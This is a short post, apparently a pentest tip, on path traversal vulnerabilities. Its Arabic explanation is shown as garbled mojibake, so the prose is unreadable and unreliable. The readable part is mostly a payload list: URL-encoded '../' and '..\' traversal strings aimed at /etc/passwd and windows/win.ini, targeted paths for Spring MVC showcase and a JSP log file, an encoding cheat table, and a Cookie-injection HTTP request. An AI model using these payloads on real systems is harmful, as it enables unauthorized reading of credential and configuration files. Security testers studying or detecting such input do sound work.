๐ ุซุบุฑุฉ Path Traversal โ ุงููุตูู ุบูุฑ ุงููุดุฑูุน ูููููุงุช

ุซุบุฑุฉ Path Traversal ุชูุนุฏ ูู ุฃุฎุทุฑ ุงูุซุบุฑุงุช ุงูุฃูููุฉุ ุญูุซ ุชูููู ุงูููุงุฌู ูู ุงููุตูู ุฅูู ูููุงุช ุฃู ูุฌูุฏุงุช ุฎุงุฑุฌ ูุทุงู ุงูุตูุงุญูุงุช ุงููุญุฏุฏุฉ ูู ูู ูุธุงู ุงููููุงุช. ูุชู ุฐูู ุนู ุทุฑูู ุงูุชูุงุนุจ ุจูุณุงุฑุงุช ุงููููุงุช ูู ุงููุฏุฎูุงุชุ ููุง ูุณูุญ ุจูุฑุงุกุฉุ ุชุนุฏููุ ุฃู ุญุฐู ูููุงุช ุญุณุงุณุฉ.

๐ฏ ุงููุฏู ูู ุงูุซุบุฑุฉ: ุงููุตูู ุฅูู ูููุงุช ุงููุธุงู ูุซู:

ูููุงุช ุงูุฅุนุฏุงุฏุงุช

ูููุงุช ุงููุฑูุฑ

ูููุงุช ุงููุธุงู ุงูุญุณุงุณุฉ ูุซู
```
/etc/passwd
```
ุฃู
```
windows/win.ini
```
๐งช ุฃูุถู ุงูู Payloads ูุงุฎุชุจุงุฑ ุงูุซุบุฑุฉ:
```
{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
๐ ุดุฑุญ ุงูุชุดููุฑุงุช ุงููุณุชุฎุฏูุฉ:
%2e%2e%2f  โ  ../
%2e%2e/    โ  ../
..%2f      โ  ../
%2e%2e%5c  โ  ..\
%2e%2e\    โ  ..\
..%5c      โ  ..\
 %252e%252e%255c  โ  ..\
 ..%255c    โ  ..\
```
๐ง ุฃูุซูุฉ ุฅุถุงููุฉ:
```
{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/windows/win.ini
{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/windows/win.ini
{{BaseURL}}/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
```
๐ช ูุซุงู ุนูู ุงุณุชุบูุงู ุนุจุฑ Cookie Injection:
```
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../
```
